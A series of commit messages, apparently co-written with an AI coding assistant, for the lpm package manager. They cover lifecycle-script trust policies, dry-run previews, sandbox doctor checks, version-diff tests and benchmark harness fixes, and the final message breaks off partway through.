- `p7_chunk5_behavioral_tag_drift_surfaces_gained_network_and_eval_in_card`
Same script body on both sides (no script drift to mask the tag
drift). Prior had only `crypto`; candidate has `crypto + eval +
network`. Asserts `+ eval` and `+ network` both appear verbatim
in the diff card. Negative pin: NO "Script content changed"
header (the script bodies match, so a regression that emitted a
spurious script section would fail this assertion).
- `p7_chunk5_behavioral_tag_drift_emits_gained_arrays_in_json`
Same scenario with `--json`. Asserts:
- `version_diff.reason: "behavioral-tag-shift"`.
- `behavioral_tags_added: ["eval", "network"]` (sorted lex per
`active_tag_names()`).
- `behavioral_tags_removed: []` (NOT null — pins the C4 wire-
shape distinction between "tag dimension drifted with no
losses" (`[]`) and "tag dimension didn't drift" (`null`)).
**Stream-separation control:**
- `p7_chunk5_list_json_stays_parseable_with_version_diff_enrichment`
Pins that stdout under `--json` is exactly one parseable JSON
document, even when `version_diff` enrichment fires. If a
regression accidentally routed `print_version_diff_card_for_blocked`'s
`println!` through stdout in JSON mode, this parse fails with the
offending shape printed for diagnosis. Mirrors the P6 Chunk 5
stream-separation pin shape.
**No-prior-binding control:**
- `p7_chunk5_first_time_review_emits_null_version_diff_and_no_card`
First-time review (no prior binding for the same package name)
must NOT render a diff card and must emit `version_diff: null` in
JSON. Pins the C1 contract that `latest_binding_for_name` returns
None in this case, surfaced through both UX paths.
## Harness
Reuses the P6 Chunk 5 shape:
- `run_lpm` with `LPM_HOME` + `HOME` overrides isolating the test
to a tempdir; `NO_COLOR` + `LPM_NO_UPDATE_CHECK` +
`LPM_DISABLE_TELEMETRY` for deterministic output.
- `seed_package` writes synthetic store entries; uses
`serde_json::Value::String` for postinstall-body JSON-escaping
so multi-line bodies (the scenario A v2 case) escape correctly.
- New helpers (P7-specific):
- `write_blocked_build_state` synthesizes a
`<project>/.lpm/build-state.json` with one blocked entry,
optional `behavioral_tags{,_hash}` fields. Stand-in for the
install pipeline's capture writer (which the harness can't
drive).
- `write_project_with_prior_binding` writes a `package.json`
with a `trustedDependencies` rich entry for the prior version,
using the on-disk wire shape (`scriptHash`, `behavioralTagsHash`,
`behavioralTags`) per `lpm-workspace::TrustedDependencyBinding`'s
serde renames.
## Local gate (touched crates)
```
cargo clippy -p lpm-workspace -p lpm-cli --all-targets -- -D warnings
# clean
cargo fmt --check
# clean
cargo test -p lpm-cli --test p7_version_diff_reference
# 6 passed; 0 failed (real subprocess runs in ~1.9s)
cargo test -p lpm-cli -p lpm-workspace
# 1745 passed; 0 failed across 11 test binaries (88 + 1573 + 84
# in test bins including the 6 new in p7_version_diff_reference)
```
Full workspace gate deferred to C6.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
§5.1 specifies allow as "runs every lifecycle script without the triage
gate." Pre-fix, `build::run`'s default-branch selector filtered
`to_build` to `is_trusted`-only at build.rs:254 regardless of policy, so
allow behaved identically to deny at the CLI boundary — a P1-era gap
flagged by v2.8 item 6. The P6 Chunk 2 helper-level test
(p6_chunk2_allow_does_not_promote_green_tier_at_helper_level) pinned
that `evaluate_trust` stays single-purpose by design; the caller-side
half of that split had no guard.
Bug-first test landed first (confirmed pre-fix red: 2/4 subprocess
tests failed), fix extracts `widen_to_build_by_policy` as a pure helper
so both the caller contract (Allow widens, Deny/Triage filter) and the
`--all` escape-hatch override are independently unit-testable.
Changes:
- `widen_to_build_by_policy(scriptable, all, effective_policy)` — pure
helper encapsulating the default-branch widening rule:
`all || policy == Allow` → every scriptable package; else → filter to
`is_trusted`. Triage's green-only promotion stays gated at
`evaluate_trust` (P6 Chunk 2 contract preserved).
- `build::run` default branch delegates to the helper. Specific-package
path (with its warn-on-missing side effect) stays inline.
- Both skipped-count warning sites gain `effective_policy != Allow`
guards — "will be skipped" + trustedDependencies pointer is
misdirection under allow because the widening folds every scripted
package into the build set.
Tests (bug-first, confirmed red pre-fix, green post-fix):
- 4 subprocess tests in `p46_close_allow_widening_reference.rs`:
project-manifest allow widens every tier; CLI override
(`--policy=allow` + `--yolo` alias) also widens; deny keeps
trusted-only filter + legacy pointer; triage does NOT widen beyond
`evaluate_trust`-promoted greens (pins the allow-scoped boundary of
the fix).
- 4 pure-function unit tests next to the P6 helper guards: Allow
includes untrusted; Deny filters to trusted; Triage filters to trusted
(green promotion was already applied by the time scriptable_packages
reached the helper); `--all` widens under every policy.
Gates passing:
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_allow_widening_reference: 4/4 pass
- commands::build::tests: 49/49 pass (4 new + 45 pre-existing; includes
all P6 Chunk 1/2/3 tests)
- p6_triage_autoexec_reference: 5/5 pass (no regression)
- p7_version_diff_reference: 6/6 pass (no regression)
Install auto-build path composes correctly: install.rs calls build::run
with `all=false` and a resolved `effective_policy`; under
`scriptPolicy=allow + autoBuild=true`, the new helper widens to every
scripted package, matching §5.1's autoBuild+allow row.
Closes §5.1's "Partially shipped as of P6 (v2.8)" — flip to fully
shipped happens in the Chunk 6 plan-doc close-out pass.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
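The widening rule from the commit above (`all || policy == Allow` widens, otherwise filter to trusted) can be sketched as follows. The helper name and parameter order come from the commit message; the `ScriptPolicy` and `Scriptable` types here are simplified stand-ins, so treat this as an illustration rather than the code in build.rs.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScriptPolicy {
    Deny,
    Allow,
    Triage,
}

/// Stand-in for a package with lifecycle scripts. `is_trusted` is assumed to
/// already include any green-tier promotion applied upstream under triage.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Scriptable {
    pub name: String,
    pub is_trusted: bool,
}

/// Default-branch selection: `--all` or an Allow policy takes every
/// scriptable package; Deny and Triage keep only the trusted ones.
pub fn widen_to_build_by_policy(
    scriptable: &[Scriptable],
    all: bool,
    effective_policy: ScriptPolicy,
) -> Vec<&Scriptable> {
    if all || effective_policy == ScriptPolicy::Allow {
        scriptable.iter().collect()
    } else {
        scriptable.iter().filter(|p| p.is_trusted).collect()
    }
}
```

Keeping the rule in a pure function is what makes the four unit-test cases (Allow, Deny, Triage, `--all`) checkable without spawning a subprocess.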
Reviewer flagged during Chunk 2 signoff that the shipped behavior no
longer matched the --help text in `lpm install` and `lpm build`:
- `--policy` (both commands) said "all three values currently behave
identically to --policy=deny" — stale since P6 shipped tier-aware
auto-execution for triage and Chunk 2 shipped allow-widening for
`lpm build`.
- `--yolo` said "currently a no-op that only logs the chosen policy" —
stale since Chunk 2.
- `--triage` said "currently a no-op" — stale since P6.
After this chunk's selection-step widening, `build --policy=allow` /
`--yolo` change execution selection, and `install` with
`autoBuild=true` inherits that through `build::run`. The help text was
user-visible contract drift on the binary's own --help output.
Rewrites both sites to describe shipped behavior:
- install --policy: enumerates deny/allow/triage with current
semantics, names the two-phase invariant (install never runs scripts;
policy governs auto-build + subsequent `lpm build`), notes Layer 4
(LLM triage) ships in 46.1.
- install --yolo: alias for --policy=allow, auto-build + `lpm build`
run every scripted package without tier gating.
- install --triage: alias for --policy=triage, tiered gate with greens
auto-approved in sandbox.
- build --policy: enumerates deny/allow/triage at the selection step
specifically; notes `--all` overrides every policy.
- build --yolo: includes every scripted package regardless of trust;
equivalent to `--all` at the selection step.
- build --triage: greens auto-promoted into the build set.
Bullet lists use blank-line paragraph breaks (`///` between each) so
clap's help reformatter renders them as paragraphs, not a run-on line.
Confirmed by inspecting `lpm install --help` / `lpm build --help`
output post-rebuild.
Gates passing:
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_allow_widening_reference: 4/4 pass (no regression)
Doc-only change; no behavior change.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Preview decisions without mutating persisted state. §11 P9 close-out
scope item per v2.10. Covers project + global surfaces explicitly per
the Chunk 3 signoff — project-mode byte-equality of `package.json`
alone would have missed the `--global` aggregate path.
## Surface
New `--dry-run` flag on `lpm approve-builds`. Combines with `--yes`,
`<pkg>`, the interactive walk, and with `--global` / `--json`. No-op
when combined with `--list` (already read-only — accepted silently
per signoff). JSON envelopes carry `"dry_run": true` so agents can
distinguish preview from live runs at parse time; human output
reframes "X approved" as "would approve X — no changes written" and
drops the `lpm build` next-step pointer.
## Mutation-site map
Project mode (`run`) — 3 write_back call sites:
- Line 289 (direct <pkg> approve, after confirm)
- Line 372 (--yes bulk)
- Line 547 (interactive walk, post-loop atomic write)
Global mode — 5 write_for call sites across 3 helpers:
- run_global_bulk_yes — 1 site (bulk aggregate write)
- run_global_named — 1 site
- run_global_interactive — 3 sites (grouped approve-all, grouped per-row,
non-grouped per-row)
Every site gains `if !dry_run { … }` around the mutation. Decision
accounting (approved / skipped vectors) still populates so the
summary surfaces the would-approve counts identically to a live run.
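The guard pattern described above, where decision accounting always runs and only the write is skipped, might look like the following. All names are hypothetical, and an in-memory `Vec` stands in for `package.json` or the global trust file.

```rust
/// Hypothetical result of an approve pass.
#[derive(Debug, Default, PartialEq, Eq)]
pub struct Summary {
    /// Packages approved (live run) or that would be approved (dry run).
    pub approved: Vec<String>,
    /// Whether persisted state was actually mutated.
    pub wrote: bool,
}

/// Approve every blocked package, writing to `store` only on a live run.
pub fn approve_all(blocked: &[&str], dry_run: bool, store: &mut Vec<String>) -> Summary {
    // Accounting happens regardless of mode, so the summary counts match.
    let approved: Vec<String> = blocked.iter().map(|s| s.to_string()).collect();
    let mut wrote = false;
    if !dry_run {
        // The only mutation site, guarded the same way at every call site.
        store.extend(approved.iter().cloned());
        wrote = true;
    }
    Summary { approved, wrote }
}
```

Populating `approved` before the guard is the design choice that lets the dry-run summary report the same counts as a live run.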
## Signature changes
- `run(project_dir, package, yes, list, dry_run, json_output)` —
new `dry_run` bool between `list` and `json_output`.
- `run_global(package, yes, list, group, dry_run, json_output)` —
new `dry_run` bool.
- Internal helpers (`run_global_bulk_yes`, `run_global_named`,
`run_global_interactive`) gain matching `dry_run` parameter.
- `print_summary` gains `dry_run` bool before `json_output`;
`#[allow(clippy::too_many_arguments)]` added with rationale
(wrapper struct would hurt readability more than 8 positional
args; fold only if a second command-level surface starts
consuming the same shape).
14 internal test-module call sites updated to pass `false` for the
new `dry_run` slot.
## Tests (6 new subprocess tests)
`crates/lpm-cli/tests/p46_close_dry_run_reference.rs`:
1. Project `--yes --dry-run --json`: `package.json` byte-equal
before/after; JSON has `"dry_run": true`; warning message
reframed as "DRY RUN — would blanket-approve…".
2. Project `<pkg> --dry-run --json`: `package.json` byte-equal;
JSON has `"dry_run": true`.
3. Project `--list --dry-run`: silent no-op — succeeds, no mutation.
4. Global `--yes --global --dry-run --json`: trust file stays
ABSENT on fresh fixture; JSON envelope has `"dry_run": true`,
`"scope": "global"`, warning reframed.
5. Global `<pkg>@<ver> --global --dry-run --json`: trust file
stays absent; matched package identity surfaces in `approved`
array for agent visibility.
6. Global `<pkg> --dry-run` against pre-seeded trust file:
byte-equal preserved — proves the short-circuit protects
existing state as well as fresh.
Fixture shapes for global mode hand-write `manifest.toml` (one
top-level install) + per-install `build-state.json` (one blocked
package). Matches the on-disk shape `lpm_global::write_for`
produces.
## Legacy-upgrade warning suppressed under dry-run
`print_summary`'s JSON `"legacy_upgraded_to_rich"` warning fires
when a legacy array-form `trustedDependencies` would have been
rewritten as the rich map form. Under `--dry-run`, no write
happens — the legacy array stays on disk. Surfacing "upgraded"
would lie, so the warning suppresses. Live-run behavior unchanged.
## Gates
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_dry_run_reference: 6/6
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
- approve_builds::tests (unit): 73/73
- approve_builds_audit_regression: 6/6 (no regression)
100 total tests across the Phase 46 + approve-builds surface, green.
## Non-goals
- Interactive walk subprocess tests. Both project and global
interactive paths require a TTY; subprocess harness can't
provide one. Source-level audit of the 3 write sites inside
`run_global_interactive` + existing `approve_builds_yes_*`
unit-test coverage + the human-output DRY RUN messaging
together pin the contract.
- Empty-aggregate and --list JSON envelopes do NOT carry
`dry_run`. Those paths are structurally read-only; adding
the field would tell agents something redundant. Principle
of least surprise: passing a redundant flag shouldn't change
the output schema.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Reviewer flagged during Chunk 3 signoff that the help text +
command-level doc comments promised "JSON envelopes carry
`"dry_run": true` so agents can detect the mode" — but `--list` paths
and empty-set short-circuits emitted envelopes without the field. An
agent invoking `approve-builds --list --dry-run --json` or
`approve-builds --dry-run --json` on an empty set couldn't detect
dry-run from the envelope, contrary to the stated contract.
Picked Option 2 from the reviewer's two paths: make the implementation
universal rather than narrow the help text. Agents read
`envelope.dry_run` without branching on mode; schema stays uniform
across every approve-builds JSON surface.
Sites updated (four emission points that produce JSON envelopes):
- `run()` empty-set short-circuit at approve_builds.rs — inline
`serde_json::json!` literal gains `"dry_run": dry_run`.
- `print_listing()` — gains `dry_run: bool` parameter, threaded from
`run()`'s caller. Envelope gains the field.
- `run_global()` empty-aggregate short-circuit — gains
`"dry_run": dry_run`.
- `print_global_list()` — gains `dry_run: bool` parameter, threaded
from `run_global()`'s caller. Envelope gains the field.
One unit test updated:
`print_global_list_handles_empty_aggregate_without_panicking` now
exercises the new parameter axis in its smoke-test shape.
## Tests (2 new subprocess + 1 upgraded)
- `p46_close_chunk3_project_list_dry_run_is_silent_no_op` upgraded:
was exit-code-and-byte-equal-only; now also asserts `dry_run: false`
on plain `--list --json` (baseline) and `dry_run: true` on
`--list --dry-run --json`, proving the universal contract on the
read-only path.
- `p46_close_chunk3_project_empty_blocked_set_json_carries_dry_run_flag`:
exercises the empty-set short-circuit (both `--yes` and
`--yes --dry-run` paths emit the flag).
- `p46_close_chunk3_global_list_json_carries_dry_run_flag_on_both_axes`:
mirror for the global `--list` envelope via `print_global_list`.
## Gates
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_dry_run_reference: 8/8 (was 6/6 pre-fix)
- approve_builds::tests (unit): 73/73 (no regression)
- approve_builds_audit_regression: 6/6 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
102 tests across the approve-builds + Phase 46 surface — one uniform
contract for agents.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…e boundary
§11 P9 close-out scope item per v2.10. Surfaces the 46.0 platform
boundaries through the existing doctor harness so users see the
sandbox-availability status and the project-only scope limit alongside
other infrastructure checks.
## New checks
### 18. Sandbox availability probe (`Sandbox`)
Constructs a synthetic SandboxSpec and calls
`lpm_sandbox::new_for_platform(spec, SandboxMode::Enforce)`. Both
backends' `new()` are memory-only (macOS Seatbelt renders an in-memory
profile string; Linux landlock does one benign ruleset-create syscall
to probe ABI), so the check costs nothing in persistent I/O and never
races with running installs.
Outcome map:
- macOS / Linux (kernel >= 5.13) → `pass` — backend name + platform in
detail (e.g., "seatbelt available on macos — lifecycle scripts run
under Enforce mode")
- Windows → `warn` with the §17.4 Phase 46.1 deferral pointer. Scripts
still run today via `--unsafe-full-env --no-sandbox`, but
`script-policy = "triage"` / `"allow"` opts out of the sandbox floor
on Windows until 46.1 — users need to know.
- Linux with kernel < 5.13 → `warn` with kernel version + landlock
requirement + upgrade remediation.
- Unexpected errors → `fail` with diagnostic detail. Shouldn't happen;
the synthetic spec is well-formed.
### 19. Scope-boundary note (`Script policy scope`)
Informational `pass` surfaced iff the global manifest carries at least
one active install. The 46.0 script-policy surface covers project
installs only; `lpm install -g` uses a separate Phase 37 trust store
that 46.1 brings into the tiered-gate + sandbox fold per D19. Users
without global installs don't see the note (avoids noise); users with
globals see the forward pointer so the capability gap is explicit, not
latent.
## Wiring
Placed after the global-installs block (checks #14-17) in
`doctor::run`, so the scope-boundary note sits visually next to the
Phase 37 rows it contextualizes.
Follows the existing `check_global_installs() -> Vec<Check>` aggregator
pattern: `check_script_policy_surface() -> Vec<Check>` composes
`probe_sandbox_backend()` (unconditional) + a conditional
`scope_boundary_note_if_globals_present(root)` (only on non-empty
globals). Split into three functions so each is independently testable
without running the whole `doctor::run` pipeline — matches how the P6
close-out helpers were extracted.
## Tests (5 new unit tests in commands::doctor::tests)
- `sandbox_probe_always_returns_a_check`: universal smoke — the probe
must never panic, always emits a named `Check` with a non-empty detail
line regardless of platform.
- `sandbox_probe_on_macos_passes_with_seatbelt_backend`
(`#[cfg(target_os = "macos")]`): macOS runners must Pass and the
detail must name `seatbelt` for user debuggability.
- `sandbox_probe_on_linux_passes_or_warns_never_fails`
(`#[cfg(target_os = "linux")]`): Linux must be Pass (landlock present)
or Warn (kernel too old), never Fail. CI runners with recent kernels
hit the Pass arm; older boxes would hit Warn but the test passes
either way — the contract is "no Fail on a supported platform."
- `sandbox_probe_on_windows_warns_with_phase_46_1_pointer`
(`#[cfg(target_os = "windows")]`): Windows must Warn with the §17.4
46.1 message present in the detail.
- `scope_boundary_note_is_absent_when_no_global_installs`: fresh
synthetic `LpmRoot` returns None.
- `scope_boundary_note_fires_when_global_installs_exist`: seeded
`manifest.toml` with one active install returns Some(Check), with
"Phase 46.1" and "project installs only" in the detail.
- `check_script_policy_surface_always_includes_sandbox_probe`:
aggregator contract — sandbox probe always first, so a future refactor
can't accidentally gate it behind a globals-exist check.
Per CLAUDE.md cross-platform rules: Linux + Windows test bodies are
`#[cfg]`-gated so they don't compile as dead code on the other
platforms' CI runners.
macOS CI runs 5 tests (universal + macOS-gated + 3 universal
scope/aggregator); Linux runs 5 (universal + Linux-gated + 3); Windows
runs 5 (universal + Windows-gated + 3).
## Gates
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- commands::doctor::tests: 70/70 (65 pre-existing + 5 new active on
macOS)
- p46_close_dry_run_reference: 8/8 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
Verified live `lpm doctor` output on developer machine (macOS with
global installs):
✔ Sandbox seatbelt available on macos — lifecycle scripts run under Enforce mode
✔ Script policy scope project installs only — global installs use a separate trust store at ~/.lpm/global/trusted-dependencies.json; Phase 46.1 extends the tiered gate + sandbox containment to globals
## Non-goals (deferred to 46.1 per v2.10 P9 trim)
- LLM detection doctor entry. Pairs with P8 Layer 4.
- Triage / policy config validation check (flagging typos in
`package.json > lpm > scriptPolicy`). The install-time warning path at
main.rs already surfaces typos; a second doctor-level check would be
redundant until the user actually runs the command. Queue if users
report hitting the gap.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
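The outcome map for the sandbox probe in the doctor commit above can be sketched as a pure function. This models only the platform-to-status table: the real check is described as constructing a backend through `lpm_sandbox::new_for_platform`, and the `Platform` and `Status` types plus the `(major, minor)` kernel tuple are assumptions made for the example. The `fail` arm for unexpected errors is omitted.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Status {
    Pass,
    Warn,
}

/// Hypothetical platform description; `kernel` is (major, minor).
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Platform {
    MacOs,
    Linux { kernel: (u32, u32) },
    Windows,
}

/// Map a platform to the doctor status described in the outcome map.
pub fn sandbox_probe_status(platform: Platform) -> Status {
    match platform {
        Platform::MacOs => Status::Pass,
        // Landlock needs kernel 5.13 or newer; tuple comparison is
        // lexicographic, so (6, 1) >= (5, 13) holds as expected.
        Platform::Linux { kernel } if kernel >= (5, 13) => Status::Pass,
        Platform::Linux { .. } => Status::Warn,
        Platform::Windows => Status::Warn,
    }
}
```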
…line snapshot
§11 P9 close-out scope item per v2.10. Two separate pieces per the
Chunk 5 signoff — wall-clock benchmarking on the 51-pkg fixture,
subprocess golden snapshot on a 2-pkg deterministic fixture.
## bench_cold_install_triage (bench/run.sh)
Reuses the existing 51-pkg fixture (17 direct deps resolving to 51
packages). Two axes against the deny baseline, matching amended
§12.7:
- Axis 1 (autoBuild off) — classification-only overhead. Measures
P1 metadata plumbing + P2 static-gate classification cost during
install timeline, scripts dormant. Target: ≤5% regression vs
deny on the same fixture.
- Axis 2 (autoBuild on) — execution-path overhead. Measures P5
sandbox spawn + P6 tier-aware auto-execution on green-classified
scripted packages. Target: ≤15% regression vs deny on the same
fixture.
Uses the existing `median_ms_ab_with_setup` helper with alternating
A/B run order per iteration so CDN / kernel-cache state can't
bias a single arm. Output includes a per-axis delta with the
target threshold inline for eyeball triage.
`format_delta` helper added for the percentage math (integer
bash arithmetic to whole-percent granularity — sufficient signal
at the wall-clock variance install benches show). Smoke-tested
in isolation: 100→105 = 5%, 100→120 = 20%, 100→95 = -5%, 0→100 =
"baseline 0ms — cannot compute delta" guard.
Wired into dispatch + `all` group + usage message. The
`workflow_dispatch` bench job in CI picks up the new arm
automatically via the `all` expansion.
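For reference, the whole-percent arithmetic behind `format_delta` can be sketched in Rust. The actual helper is a bash function in `bench/run.sh`; the signature and the `Option` return used here are assumptions chosen to mirror the zero-baseline guard described above.

```rust
/// Whole-percent delta of `candidate_ms` relative to `baseline_ms`, using
/// integer arithmetic only (the result truncates toward zero).
/// Returns `None` for a zero baseline, where no delta can be computed.
fn format_delta(baseline_ms: i64, candidate_ms: i64) -> Option<i64> {
    if baseline_ms == 0 {
        return None;
    }
    Some((candidate_ms - baseline_ms) * 100 / baseline_ms)
}
```

Multiplying before dividing keeps the precision that integer division would otherwise discard.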
v2.10 §0 item 3 documented why this reframes the original
"≤5% on no-scripts case, ≤15% on scripts case" gate — a
postinstall-free fixture produces a vacuous zero-by-construction
delta, so the honest measurement is the two-axis split on a
realistic fixture.
## Deterministic baseline snapshot (lpm-cli/tests/p46_close_policy_deny_baseline.rs)
The §18 "zero-regression guarantee for the default" contract
transposed onto a subprocess-driven byte-equal golden:
- 2-pkg synthetic fixture: trusted-pkg (legacy bare-name entry
in package.json > lpm > trustedDependencies) + untrusted-pkg
(no binding). Under --policy=deny, the default-branch filter
includes the trusted one and drops the untrusted one.
- `lpm build --dry-run --policy=deny --json` on this fixture
produces deterministic stdout because serde_json's
preserve_order feature is on workspace-wide + the one-script
shape avoids HashMap iteration nondeterminism.
- Golden committed at
`tests/fixtures/p46_close_policy_deny_baseline.stdout` (13
lines). Any drift — intentional schema evolution or
accidental regression — forces the developer to touch this
file and decide. Re-capture with `UPDATE_GOLDEN=1`.
Why `lpm build --dry-run` and not `lpm install` directly: real
install against a synthetic fixture needs network or wiremock,
both out of 46.0 close-out scope (v2.9 residual gap). The
dry-run JSON output is a direct function of the post-install
persisted state, and under deny its shape is the pre-Phase-46
contract verbatim — sufficient for the zero-regression
guarantee. The test module's doc comment spells this out for
future readers.
Two tests:
- `p46_close_chunk5_policy_deny_dry_run_json_matches_golden` —
byte-equal assertion. Manually verified by mutating the
golden ("echo hi" → "echo drift") pre-commit: test failed
with a clear diff pointing at the drifted line + the
UPDATE_GOLDEN recovery command. Then restored.
- `p46_close_chunk5_policy_deny_dry_run_json_stdout_is_clean_json` —
stream-separation sanity: stdout parseable, single package,
trusted flag present. Pairs with the golden to catch stream
bleed.
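A byte-equal golden check with a re-capture switch might look like the sketch below. It is an illustration under assumptions: the function name, the `update` flag (which a caller would derive from the `UPDATE_GOLDEN` environment variable), and the error wording are hypothetical, not taken from the test file.

```rust
use std::fs;
use std::path::Path;

/// Compares `actual` byte-for-byte against the golden file.
/// When `update` is true the golden is overwritten instead of compared.
fn compare_with_golden(golden: &Path, actual: &str, update: bool) -> Result<(), String> {
    if update {
        return fs::write(golden, actual).map_err(|e| e.to_string());
    }
    let expected = fs::read_to_string(golden)
        .map_err(|e| format!("cannot read golden {}: {}", golden.display(), e))?;
    if expected == actual {
        return Ok(());
    }
    // Count the leading lines that agree so the message points at the first drifted line.
    let shared = expected
        .lines()
        .zip(actual.lines())
        .take_while(|(e, a)| e == a)
        .count();
    Err(format!(
        "golden drift at line {}; re-capture with UPDATE_GOLDEN=1",
        shared + 1
    ))
}
```

A test would call it with `std::env::var_os("UPDATE_GOLDEN").is_some()` as the last argument, so the flag stays out of the comparison logic.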
## Scope decisions
- Golden captures stdout only. Stderr contains ANSI + cliclack
formatting that varies across terminal widths and versions;
byte-equal on stderr would flake.
- Fixture uses `lpm build`, not `lpm install`. Documented
rationale in the test module's doc comment (network vs
wiremock scope).
- Bench is manual-trigger only (CI's `bench: workflow_dispatch`
job). Not gating PR merges; purely a measurement tool.
## Gates
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- bash -n bench/run.sh (clean)
- p46_close_policy_deny_baseline: 2/2
- p46_close_dry_run_reference: 8/8 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
- Bench dispatch smoke: `./bench/run.sh cold-install-triage`
appears in the "Available:" list and routes correctly.
## Non-goals
- Running the full bench for real in this commit. Real
cold-install takes network + ~60-90s for 2 axes × 3 runs ×
2 arms. The bench job runs on workflow_dispatch only; this
commit ships the harness, not the measurement. When the
release manager cuts 46.0 they'll run the bench manually
to confirm the ≤5% / ≤15% gates hold on the reference
machine and record the baseline in `bench/baselines/`.
- Snapshot on `lpm install` directly. Requires wiremock or
real network — explicitly deferred per v2.9 residual gap.
- Multi-package script-hash drift regression tests. Covered
by P6/P7 reference fixtures at a different granularity.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…erhead
Reviewer flagged during Chunk 5 signoff that the original wording over-claimed. Axis 2 was labeled "execution-path overhead" for P5 sandbox spawn + P6 tier auto-execution, but on the current 51-pkg bench fixture no packages have `preinstall` / `install` / `postinstall` scripts. `EXECUTED_INSTALL_PHASES` at crates/lpm-security/src/lib.rs:70 is exactly those three phases, and the pure-JS fixture (zod, dayjs, lodash, etc.) uses only `prepare` / `prepublishOnly`, which are not in LPM's executed set. So the autoBuild=on arm walks install → should_auto_build → build::run → `evaluate_trust` per package → empty scriptable set → early return. That's a measurable control-path walk, but the sandbox never spawns and P6 auto-execution never fires. The original "≤15% execution-path overhead" target was unsound as stated on this fixture.
Picking Option 2 from the reviewer's two natural next steps (relabel + defer true-execution bench, rather than curate a script-bearing fixture now). Fixture curation is a separate workstream: pinning a green-classified preinstall/install/postinstall package whose own script duration doesn't dominate the sandbox spawn cost, keeping it reproducible across time, deciding which package class is representative, etc. That is genuine design work that doesn't fit a close-out chunk scope.
## Bench changes
- Axis 2 relabeled: "auto-build CONTROL-PATH overhead (autoBuild on)", not "execution-path overhead."
- Axis 2 target: ≤5% (same as Axis 1), matching what a control-path walk realistically costs; the ≤15% was premised on sandbox spawn ~10ms/script overhead that doesn't apply here.
- Header comment gains a ⚠ block pointing at EXECUTED_INSTALL_PHASES, naming the missing script classes in the fixture, and stating the deferral.
- Per-run output line gains a `note:` follow-up clarifying "control-path only (no scripts in fixture); execution-path bench deferred."
## Plan-doc follow-up
§0 v2.11 on `phase-46-p4-server-side` of `a-package-manager` documents the audit + narrows §12.7's Axis 2 claim to match. Landing separately; both commits together complete the corrected Chunk 5.
## Gates (no code change behind the relabel)
- bash -n bench/run.sh (clean)
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- All Phase 46 regression suites: 25/25 (no semantic change)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
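Why the fixture yields an empty scriptable set can be illustrated with a small filter over a package's `scripts` map. Only the constant name and its three phases come from the commit text; the function name and the map type are hypothetical.

```rust
use std::collections::BTreeMap;

/// The three lifecycle phases the commit says LPM executes at install time.
const EXECUTED_INSTALL_PHASES: [&str; 3] = ["preinstall", "install", "postinstall"];

/// Returns the executed phases a package actually declares, in phase order.
/// `scripts` models the `scripts` object of a package.json.
fn scriptable_phases(scripts: &BTreeMap<&str, &str>) -> Vec<&'static str> {
    EXECUTED_INSTALL_PHASES
        .iter()
        .copied()
        .filter(|phase| scripts.contains_key(*phase))
        .collect()
}
```

A package declaring only `prepare` and `prepublishOnly` maps to an empty vector, which is the early-return case the relabeled Axis 2 measures.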
The bench harness hardcoded `$BENCH_DIR/.work` (inside the repo),
which lives under a VS-Code-watched tree. Every `cold-install-clean`
iteration writes ~25 MB / thousands of files into `node_modules/`,
triggering FSEvents → VS Code's file-watcher → `@vscode/ripgrep`
scans with `--no-ignore --follow` (which bypasses the `.gitignore`
exclusion of `bench/.work`). The rg workers spawn faster than they
reap, accumulate, and eventually saturate the macOS `-u`
(processes) ulimit (~2666 on Apple Silicon). At saturation, new
forks — DNS helpers, tokio worker threads, anything — stall with
`resource temporarily unavailable`, and the whole machine looks
frozen while benches run. This was diagnosed during the 46.0
tag-cut A/B cross-binary validation on 2026-04-23.
Two small env knobs pull the harness out of the watched tree:
- `BENCH_WORK_DIR` — redirects the per-iter scratch path; default
`$BENCH_DIR/.work` preserved for CI compat.
- `BENCH_PROJECT_DIR` — redirects the fixture `package.json`
source; default `$BENCH_DIR/project` preserved.
Example: the 46.0 A/B across a larger fixture runs with
BENCH_WORK_DIR=/tmp/lpm-bench BENCH_PROJECT_DIR=/tmp/lpm-large-fixture \
./bench/run.sh cold-install-clean
No binary / logic change — pure harness path ergonomics. Preserves
all existing bench invocations bit-for-bit.
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The helper `build_blocked_set_metadata` in install.rs previously walked `for p in packages` and `.await`ed `get_package_metadata` (resolver TTL cache lookup) + `fetch_provenance_snapshot` (attestation fetch, cache-first) **serially per package**. Even with both caches warm, that's two async boundary crossings per package (~3 ms of overhead each), which stacks linearly with the resolved dep count.
